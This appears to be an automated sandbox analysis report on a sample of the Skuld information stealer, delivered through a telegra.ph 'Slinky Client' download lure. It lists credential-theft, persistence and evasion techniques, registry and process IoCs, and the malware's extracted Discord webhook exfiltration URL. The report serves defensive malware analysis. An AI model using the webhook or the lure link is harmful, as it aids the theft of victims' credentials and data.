skuld | hxxp://telegra[.]ph/Slinky-Client-Latest-Download-05-21

Analysis

max time kernel
66s
max time network
65s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
13-08-2024 21:17

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

http://telegra.ph/Slinky-Client-Latest-Download-05-21

Score

10^/10

skuld credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer

Malware Config

Extracted

Family

skuld

https://ptb.discord.com/api/webhooks/1272127018074640406/dHVa75jSMPaiEdYbiSLUjNWITHphosFrlmkfwpka_RSvNBCLhgp_ZiHAdnIAbdCZnLgB

Signatures

Skuld stealer
An info stealer written in Go lang.
stealer skuld
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exe

pid process

5148 powershell.exe
4420 powershell.exe

pid	process
5148	powershell.exe
4420	powershell.exe

Drops file in Drivers directory 3 IoCs

Processes:

attrib.exeslinky.exeattrib.exe

description	ioc	process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	slinky.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Executes dropped EXE 1 IoCs

Processes:

slinky.exe

pid process

1232 slinky.exe
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

pid	process
1232	slinky.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

slinky.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio Universal Service = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Protect\\SecurityHealthSystray.exe"	slinky.exe

Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

92 api.ipify.org
93 api.ipify.org
94 ip-api.com

flow	ioc
92	api.ipify.org
93	api.ipify.org
94	ip-api.com

Maps connected drives based on registry 3 TTPs 2 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

slinky.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	slinky.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	slinky.exe

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010
Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

Processes:

netsh.exe

description	ioc	process
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 1 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
discovery

Wi-Fi Discovery
T1016.002

Processes:

netsh.exe

pid process

4996 netsh.exe
Detects videocard installed 1 TTPs 2 IoCs
Uses WMIC.exe to determine videocard installed.

System Information Discovery
T1082

Processes:

wmic.exewmic.exe

pid process

6012 wmic.exe
3712 wmic.exe

pid	process
4996	netsh.exe

pid	process
6012	wmic.exe
3712	wmic.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe

GoLang User-Agent 1 IoCs
Uses default user-agent string defined by GoLang HTTP packages.

Processes:

description flow ioc

HTTP User-Agent header 95 Go-http-client/1.1

description	flow	ioc
HTTP User-Agent header	95	Go-http-client/1.1

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

Processes:

slinky.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C	slinky.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0400000001000000100000003e455215095192e1b75d379fb187298a0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d090000000100000068000000306606082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050508020206082b0601050507030606082b0601050507030706082b0601050507030906082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520031000000620000000100000020000000ebd41040e4bb3ec742c9e381d31ef2a41a48b6685c96e7cef3c1df6cd4331c99140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b9992367f000000010000000c000000300a06082b060105050703097a000000010000000c000000300a06082b060105050703097e00000001000000080000000000042beb77d501030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c190000000100000010000000a823b4a20180beb460cab955c24d7e21200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	slinky.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 5c000000010000000400000000080000190000000100000010000000a823b4a20180beb460cab955c24d7e21030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c7e00000001000000080000000000042beb77d5017a000000010000000c000000300a06082b060105050703097f000000010000000c000000300a06082b060105050703091d00000001000000100000006ee7f3b060d10e90a31ba3471b999236140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b620000000100000020000000ebd41040e4bb3ec742c9e381d31ef2a41a48b6685c96e7cef3c1df6cd4331c990b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520031000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000068000000306606082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050508020206082b0601050507030606082b0601050507030706082b0601050507030906082b0601050507030106082b060105050703080f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d0400000001000000100000003e455215095192e1b75d379fb187298a200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	slinky.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

msedge.exemsedge.exeidentity_helper.exemsedge.exeslinky.exepowershell.exepowershell.exe

pid	process
4928	msedge.exe
4928	msedge.exe
2404	msedge.exe
2404	msedge.exe
3920	identity_helper.exe
3920	identity_helper.exe
5376	msedge.exe
5376	msedge.exe
1232	slinky.exe
1232	slinky.exe
1232	slinky.exe
1232	slinky.exe
1232	slinky.exe
1232	slinky.exe
1232	slinky.exe
1232	slinky.exe
5148	powershell.exe
5148	powershell.exe
5148	powershell.exe
1232	slinky.exe
1232	slinky.exe
1232	slinky.exe
1232	slinky.exe
4420	powershell.exe
4420	powershell.exe
1232	slinky.exe
1232	slinky.exe
4420	powershell.exe
1232	slinky.exe
1232	slinky.exe
1232	slinky.exe
1232	slinky.exe
1232	slinky.exe
1232	slinky.exe
1232	slinky.exe
1232	slinky.exe
1232	slinky.exe
1232	slinky.exe
1232	slinky.exe
1232	slinky.exe
1232	slinky.exe
1232	slinky.exe
1232	slinky.exe
1232	slinky.exe
1232	slinky.exe
1232	slinky.exe
1232	slinky.exe
1232	slinky.exe
1232	slinky.exe
1232	slinky.exe
1232	slinky.exe
1232	slinky.exe
1232	slinky.exe
1232	slinky.exe
1232	slinky.exe
1232	slinky.exe
1232	slinky.exe
1232	slinky.exe
1232	slinky.exe
1232	slinky.exe
1232	slinky.exe
1232	slinky.exe
1232	slinky.exe
1232	slinky.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs

Processes:

msedge.exe

pid process

2404 msedge.exe
2404 msedge.exe
2404 msedge.exe
2404 msedge.exe
2404 msedge.exe
2404 msedge.exe
2404 msedge.exe
2404 msedge.exe
2404 msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

AUDIODG.EXE7zG.exeslinky.exewmic.exewmic.exe

description	pid	process
Token: 33	452	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	452	AUDIODG.EXE
Token: SeRestorePrivilege	5888	7zG.exe
Token: 35	5888	7zG.exe
Token: SeSecurityPrivilege	5888	7zG.exe
Token: SeSecurityPrivilege	5888	7zG.exe
Token: SeDebugPrivilege	1232	slinky.exe
Token: SeIncreaseQuotaPrivilege	5600	wmic.exe
Token: SeSecurityPrivilege	5600	wmic.exe
Token: SeTakeOwnershipPrivilege	5600	wmic.exe
Token: SeLoadDriverPrivilege	5600	wmic.exe
Token: SeSystemProfilePrivilege	5600	wmic.exe
Token: SeSystemtimePrivilege	5600	wmic.exe
Token: SeProfSingleProcessPrivilege	5600	wmic.exe
Token: SeIncBasePriorityPrivilege	5600	wmic.exe
Token: SeCreatePagefilePrivilege	5600	wmic.exe
Token: SeBackupPrivilege	5600	wmic.exe
Token: SeRestorePrivilege	5600	wmic.exe
Token: SeShutdownPrivilege	5600	wmic.exe
Token: SeDebugPrivilege	5600	wmic.exe
Token: SeSystemEnvironmentPrivilege	5600	wmic.exe
Token: SeRemoteShutdownPrivilege	5600	wmic.exe
Token: SeUndockPrivilege	5600	wmic.exe
Token: SeManageVolumePrivilege	5600	wmic.exe
Token: 33	5600	wmic.exe
Token: 34	5600	wmic.exe
Token: 35	5600	wmic.exe
Token: 36	5600	wmic.exe
Token: SeIncreaseQuotaPrivilege	5600	wmic.exe
Token: SeSecurityPrivilege	5600	wmic.exe
Token: SeTakeOwnershipPrivilege	5600	wmic.exe
Token: SeLoadDriverPrivilege	5600	wmic.exe
Token: SeSystemProfilePrivilege	5600	wmic.exe
Token: SeSystemtimePrivilege	5600	wmic.exe
Token: SeProfSingleProcessPrivilege	5600	wmic.exe
Token: SeIncBasePriorityPrivilege	5600	wmic.exe
Token: SeCreatePagefilePrivilege	5600	wmic.exe
Token: SeBackupPrivilege	5600	wmic.exe
Token: SeRestorePrivilege	5600	wmic.exe
Token: SeShutdownPrivilege	5600	wmic.exe
Token: SeDebugPrivilege	5600	wmic.exe
Token: SeSystemEnvironmentPrivilege	5600	wmic.exe
Token: SeRemoteShutdownPrivilege	5600	wmic.exe
Token: SeUndockPrivilege	5600	wmic.exe
Token: SeManageVolumePrivilege	5600	wmic.exe
Token: 33	5600	wmic.exe
Token: 34	5600	wmic.exe
Token: 35	5600	wmic.exe
Token: 36	5600	wmic.exe
Token: SeIncreaseQuotaPrivilege	3712	wmic.exe
Token: SeSecurityPrivilege	3712	wmic.exe
Token: SeTakeOwnershipPrivilege	3712	wmic.exe
Token: SeLoadDriverPrivilege	3712	wmic.exe
Token: SeSystemProfilePrivilege	3712	wmic.exe
Token: SeSystemtimePrivilege	3712	wmic.exe
Token: SeProfSingleProcessPrivilege	3712	wmic.exe
Token: SeIncBasePriorityPrivilege	3712	wmic.exe
Token: SeCreatePagefilePrivilege	3712	wmic.exe
Token: SeBackupPrivilege	3712	wmic.exe
Token: SeRestorePrivilege	3712	wmic.exe
Token: SeShutdownPrivilege	3712	wmic.exe
Token: SeDebugPrivilege	3712	wmic.exe
Token: SeSystemEnvironmentPrivilege	3712	wmic.exe
Token: SeRemoteShutdownPrivilege	3712	wmic.exe

Suspicious use of FindShellTrayWindow 51 IoCs

Processes:

msedge.exe7zG.exe

pid	process
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
5888	7zG.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe

Suspicious use of SendNotifyMessage 40 IoCs

Processes:

msedge.exe

pid	process
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

msedge.exe

description	pid	process	target process
PID 2404 wrote to memory of 4496	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 4496	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 2264	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 2264	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 2264	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 2264	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 2264	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 2264	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 2264	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 2264	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 2264	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 2264	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 2264	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 2264	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 2264	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 2264	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 2264	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 2264	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 2264	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 2264	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 2264	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 2264	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 2264	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 2264	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 2264	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 2264	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 2264	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 2264	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 2264	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 2264	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 2264	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 2264	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 2264	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 2264	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 2264	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 2264	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 2264	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 2264	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 2264	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 2264	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 2264	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 2264	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 4928	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 4928	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 548	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 548	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 548	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 548	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 548	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 548	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 548	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 548	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 548	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 548	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 548	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 548	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 548	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 548	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 548	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 548	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 548	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 548	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 548	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 548	2404	msedge.exe	msedge.exe

Views/modifies file attributes 1 TTPs 4 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exeattrib.exeattrib.exeattrib.exe

pid process

5520 attrib.exe
5548 attrib.exe
6100 attrib.exe
4536 attrib.exe

pid	process
5520	attrib.exe
5548	attrib.exe
6100	attrib.exe
4536	attrib.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://telegra.ph/Slinky-Client-Latest-Download-05-21
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2404
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd8ef146f8,0x7ffd8ef14708,0x7ffd8ef14718
  2⤵
  PID:4496
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2056,14689391077284460495,9103650220437831816,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2064 /prefetch:2
  2⤵
  PID:2264
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2056,14689391077284460495,9103650220437831816,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2136 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4928
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2056,14689391077284460495,9103650220437831816,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2684 /prefetch:8
  2⤵
  PID:548
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,14689391077284460495,9103650220437831816,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3280 /prefetch:1
  2⤵
  PID:3712
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,14689391077284460495,9103650220437831816,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3272 /prefetch:1
  2⤵
  PID:2700
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,14689391077284460495,9103650220437831816,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4716 /prefetch:1
  2⤵
  PID:4396
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,14689391077284460495,9103650220437831816,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5148 /prefetch:1
  2⤵
  PID:512
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2056,14689391077284460495,9103650220437831816,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5796 /prefetch:8
  2⤵
  PID:2236
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2056,14689391077284460495,9103650220437831816,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5796 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3920
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
